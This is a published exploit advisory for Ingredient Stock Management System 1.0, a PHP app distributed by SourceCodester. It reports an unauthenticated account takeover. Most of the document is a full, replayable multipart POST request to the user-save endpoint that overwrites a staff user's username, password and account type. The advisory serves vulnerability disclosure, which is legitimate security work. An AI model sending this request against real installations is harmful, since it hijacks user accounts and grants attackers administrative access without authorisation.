Headline
Ingredient Stock Management System 1.0 Account Takeover
Ingredient Stock Management System version 1.0 suffers from an account takeover vulnerability.
# Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)# Date: 28/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, LinuxDescription :----------------------Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.An attacker can takeover any registered 'Staff' user account by just sending below POST requestBy changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters# HTTPS Request :POST /isms/classes/Users.php?f=save HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555Content-Length: 1023Origin: http://localhostConnection: closeReferer: http://localhost/isms/admin/?page=user/manage_userCookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="id"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="firstname"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="middlename"-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="lastname"hi-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="username"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="password"test-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="type"1-----------------------------89160456138077069512415726555Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------89160456138077069512415726555--====URL Login : http://localhost/isms/admin/login.php